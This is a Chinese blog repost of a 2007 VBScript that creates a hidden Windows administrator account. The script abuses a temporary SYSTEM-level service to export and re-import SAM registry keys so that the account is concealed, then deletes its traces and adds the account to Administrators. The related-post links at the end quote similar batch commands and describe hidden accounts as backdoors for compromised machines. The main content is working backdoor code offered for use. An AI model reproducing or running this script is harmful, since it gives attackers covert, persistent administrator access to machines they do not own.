系统隐藏账户添加脚本

最新推荐文章于 2024-05-30 11:43:13 发布
最新推荐文章于 2024-05-30 11:43:13 发布
阅读量135 收藏
点赞数
文章标签: 操作系统 python
原文链接:https://my.oschina.net/veterans/blog/27844
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

早期写的代码,见笑了

'==============================================================
' Copyright (c) veterans. All rights reserved.
' ScriptName: ca.vbs
' Creation Date: 28/6/2007
' Last Modified: 28/6/2007
' Author: veterans
' E-mail: lxzzr@21cn.com
' Description: System hide account creation tool.
'==============================================================
On Error Resume Next

strUserName = Wscript.Arguments(0)
strPassWord = Wscript.Arguments(1)
'接受两个参数,分别为用户名和密码

If (lcase(right(wscript.fullname,11))="wscript.exe") Then
	WScript.Quit(0)
End If
'判断脚本宿主

If wscript.arguments.count<2 Then
	Wscript.Echo "System hide account creation tool."
	Wscript.Echo ""
	Wscript.Echo "Usage: cscript.exe //nologo " & WScript.ScriptName & " username$ password"
	WScript.Quit(0)
End If
'判断输入的参数个数

Set ObjectNetwork = CreateObject("Wscript.Network")
strComputer = ObjectNetwork.ComputerName
'获取计算机名,必须用字符串,不能用.代替

Set ObjectWMI = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

Set CheckAccount = ObjectWMI.ExecQuery("Select * from Win32_UserAccount WHERE Name='" & strUserName & "'")
If CheckAccount.count<>0 Then
	Wscript.Echo "Account already exists."
	WScript.Quit(0)
End If
'检测账户是否存在

Set ObjectComputer = GetObject("WinNT://" & strComputer & ",computer")
Set CreateAccount = ObjectComputer.Create("user", strUserName)
CreateAccount.SetPassword strPassWord
CreateAccount.SetInfo
'添加用户,但不属于任何组

strServiceName = "ForCreateAccount"
Set CheckService = ObjectWMI.ExecQuery("Select * from Win32_UserAccount WHERE Name='" & strServiceName & "'")
If CheckService.count<>0 Then
	strServiceName = "ForCreateAccount-test"
End If
'检测服务是否存在

Set ObjectSvr = ObjectWMI.Get("Win32_Service")
ObjectSvr.Create strServiceName, strServiceName, "c:\windows\regedit.exe /e %temp%\user.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users", 16, 2, "Automatic", true, Null, null
'添加服务以获得系统权限,导出注册表

Set ObjectServices = ObjectWMI.ExecQuery("Select * from Win32_Service where Name='" & strServiceName & "'")
For each ObjectService in ObjectServices
	ObjectService.StartService()
	ObjectService.StopService()
	'导出注册表
	
	Set ObjectAccount = GetObject("WinNT://" & strComputer & "/" & strUserName & ",user")
	
	Set DelAccount = GetObject(ObjectAccount.Parent)
	DelAccount.delete "user", ObjectAccount.Name
	'删除用户
	
	WScript.Sleep 1000
	
	ChangeReturn = ObjectService.Change( , "c:\windows\regedit.exe /s %temp%\user.reg")
	ObjectService.StartService()
	ObjectService.StopService()
	'导入注册表
	
	ObjectService.Delete()
	'删除服务
	
	Set ObjectFiles = ObjectWMI.ExecQuery("Select * from cim_datafile where name='c:\\windows\\temp\\user.reg'")
	For Each ObjectFile in ObjectFiles
		ErrorReturn = ObjectFile.Delete
	Next
	'删除临时文件
	
	Set AddGroup = GetObject("WinNT://" & strComputer & "/Administrators,group")
	AddGroup.Add(ObjectAccount.ADsPath)
	'将用户添加到管理员组
Next

Set ObjectGroupUsers = ObjectWMI.ExecQuery("Select * from Win32_GroupUser")
For Each ObjectUser In ObjectGroupUsers

	Group = split(ObjectUser.GroupComponent,"=")
	User = split(ObjectUser.PartComponent,"=")
	
	If (User(2)="""" & strUserName & """" and Group(2)="""Administrators""") Then
		Wscript.Echo "Account creation success."
		WScript.Quit(0)
	End If
	
Next
Wscript.Echo "Account creation failure."
'验证账户是否创建成功

转载于:https://my.oschina.net/veterans/blog/27844

weixin_34217711
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
如何使用计算机隐藏功能,Win7系统25个隐蔽功能使用方法
weixin_33657398的博客
06-21 1684
Win7系统中有很多的隐蔽功能,利用这些功能可以给文件上锁、解决疑难问题、自动清理电脑、还原系统等等。很多借助软件才能达到的功能,基本上在Win7系统下都能实现,所以说Win7还是个很强大的系统,只不过我不知道而已。下面就来介绍一下Win7的25个实用隐蔽功能:1、问题步骤记录器有很多时候,身在远方的家人或者是朋友会要求您辅导他们计算机问题,但是又不知道该如何明确向您表达这个问题,这个处境是很令人...
WindowsServer2016系统管理视频教程csdn.txt
04-04
7-8配置登录脚本 有人登录服务器给你的手机发短信05:02 第8章在企业环境部署打印机1小时7节 8-1配置打印服务器15:43 8-2连接网络打印机10:49 8-3使用组策略部署打印机09:42 8-4设置打印权限05:50 8-5设置打印机的...
添加隐藏用户脚本
caiguazheng4921的博客
04-19 131
net user admins$ 1234567 /addnet localgroup administrators admins$ /addEcho HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.iniEcho HKEY_LOCA...
bat全自动添加隐藏用户的脚本
weixin_30629653的博客
06-03 319
net user admins$ 123456 /addnet localgroup administrators admins$ /addEcho HKEY_LOCAL_MACHINESAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINESAMSAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINESAMSAM...
建立隐藏的超管账户,hideadmin的用法!
simon803的专栏
06-24 1万+
当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最 多的就是账户隐藏技术。在肉鸡上建立一个隐藏账户,以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门,一般用户 很难发现系统隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密。       在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统
Windows批处理创建、删除隐藏账户,实现远程登录
weixin_48703780的博客
02-27 4227
WindowsXp批处理添加、删除隐藏账户 一、手动操作 新建一个用户 利用命令行直接输或者做成批处理程序具体内容如下: @echo off net user godyang$ 123456 /add net localgroup administrators godyang$ /add pause 运行结果如图: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-I1QTpf1d-1614354398629)(RackMultipart20210226-4-1marn40_
[网络安全]实验2-创建完全隐藏账户-开机创建关机删除
杨北林
09-30 1139
创建完全隐藏账户-开机创建用户关机删除用户 一、实验运行环境     在Oracle VM VirtualBox环境下WinXP系统,关于创建隐藏用户问题讨论: 二、具体实验内容 创建一个账户 ------右击“我的电脑”→单击“管理”→选择“本地用户和组”→单击“用户”→在空白处右击,然后点击“新用户”→输入用户名“abc”→单击“创建”即可。 ------检测用户是否创建完成:     打开Windows命令窗口(wi
windows创建隐藏用户及后门
diaobusi的博客
06-20 2079
Windows操作系统中,用户系统是用于管理和控制用户访问、权限和资源的一组功能和机制。以下是Windows用户系统的一些关键概念和组成部分:用户账户Windows用户系统基于用户账户来管理用户访问和权限。每个用户都必须拥有一个唯一的用户账户,用户账户包含了用户的登录名和密码等信息。用户账户可以是本地账户(仅限于本地计算机)或域账户(属于域控制器管理的网络域)。
文件系统隐藏权限
siyanyanyanyai的专栏
03-15 1463
大部分属性在文件系统的安全管理方面起很重要的作用。 一  课前预备知识:文件系统分类、文件系统显示权限及其修改方式、对于所属者、所属组、其他用户的认识及其定义 Linux 最早的文件系统是Minix,但是专门为Linux 设计的文件系统——扩展文件系统第二版或EXT2被设计出来并添加到Linux中,这对Linux产生了重大影响。EXT2文件系统功能强大、易扩充、性能上进行了全面优化,也是现
Linux系统后门技术(隐藏帐户篇)
tuna_lxg的专栏
05-15 1万+
Linux系统后门技术(隐藏帐户篇)          每当我们欢天喜地的得到一个linux系统的服务器肉鸡时,最大的愿望就是能把它永远留住。当然,永远留住是不可能的,但是我们要尽量的不让它飞走。这就要用到linux的后门技术了,这是项复杂的技术,本人水平有限不可能面面俱到,我只希望这一系列文章能为大家提供一点思路,在您hacking的道路上打开一扇方便之门!        言归
数据库系统工程师考点笔记
热门推荐
gly1653810310的博客
04-14 2万+
本人在备战数据库系统工程师的考试,把刷历年真题碰到的知识点记录在这边。(目录是第四版教程)
Windows Server 2012 系统管理视频课程csdn.txt
04-04
6-3多次共享和隐藏共享04:31 6-4管理默认共享02:52 6-5发布共享文件夹到活动目录04:05 6-6访问共享文件夹方法03:56 6-7限制文件夹大小08:25 6-8介绍分布式文件系统DFS06:52 6-9准备DFS环境06:43 6-10安装和配置DFS18...
Windows Server 2008系统管理视频教程csdn.txt
04-04
3-4创建隐藏账户08:56 3-5创建不属于管理员组的管理员06:54 3-6使用密码重设盘恢复密码06:16 3-7系统内置的组和自定义组04:05 3-8系统内置的组和自定义组04:05 3-9用户配置文件10:23 3-10管理缓存的网络凭据13:56 3-...
H3BPM 试用系统操作手册
04-25
在Portal门户的流程中心中发起【表单和控件->模版子表】流程,在表单中点击子表的添加按钮,查看新增行的子表效果; 3.2.2 表单设计流程 功能展示  展示开窗查询;  展示联动查询;  字段的自动运算;  ...
Linux - 磁盘的分区和挂载
weixin_45735487的博客
05-27 808
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
在linux服务器上使用tensorboard,错误记录
最新发布
wwwwzm的博客
05-30 941
1. 使用tensorboard命令时,不是从虚拟环境中找tensorboard,而是从(全局路径)中找(/home/ljx/.local/lib/python3.9/site-packages/tensorboard)是一个在 Unix-like 系统(包括 Linux 和 macOS)的命令行界面(如 Bash shell)中使用的命令。2.使用which命令, 查看使用的tensorboard的路径,发现使用的是全局路径,不是虚拟环境路径。是一个特殊的变量,它定义了操作系统搜索可执行文件的目录。
操作系统 - 输入/输出(I/O)管理
qq_56815564的博客
05-27 1005
1、设备的分类I/O设备是指**可以将数据输入计算机的外部设备,或者可以接收计算机输出数据的外部设备**按信息交换的单位分类块设备。信息交换以**数据块为单位,如磁盘、磁带等磁盘设备的基本特征是传输速率较高、可寻址,即对它可随机地读/写任意一块**字符设备。信息交换以**字符为单位,如交互式终端机、打印机等它们的基本特征是传输速率低、不可寻址,并且时常采用中断I/O方式**按设备的传输速率分类低速设备。传输速率仅为每秒几字节到数百字节,如键盘、鼠标等中速设备。
【Linux】中常见的重要指令(下)以及重要的几个热键
2401_84568462的博客
05-27 1245
find指令查找的文件不能当前路径下(可以这样理解:如果要查找当前路径下可以使用ls指令,就不麻烦find指令了),必须查找当前路径下的目录里的文件。1.能被打包压缩的一定是由多个文件组成的,打包压缩后将文件变为一个整体,在传递给其他用户时不容易缺失。.tar打包后缀 .gz压缩后缀 XXX.tar.gz ----->XXX.tgz。功能:在系统特定的路径下查找,及可以找到可执行程序,有可以找到手册,安装包和压缩包等。命令在目录结构中搜索文件,并执行指定的操作。功能:在指令路径下搜索指令文件。
[Nodejs]使用adm-zip和fs-extra压缩打包后的文件
ice_cream__的博客
05-29 227
现在学到了一种新方法,通过nodejs环境来实现文件、文件夹的复制粘贴,还有压缩解压缩等操作,那就是使用adm-zip、fs-extra这两个工具。
android12 系统添加脚本
11-12
Android 12系统添加脚本的功能,为用户提供了更加灵活和个性化的手机操作体验。 脚本是一种包含了一系列命令和指令的文本文件,它可以自动化执行一些常见的操作,比如设置手机的亮度、音量、网络连接状态等。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值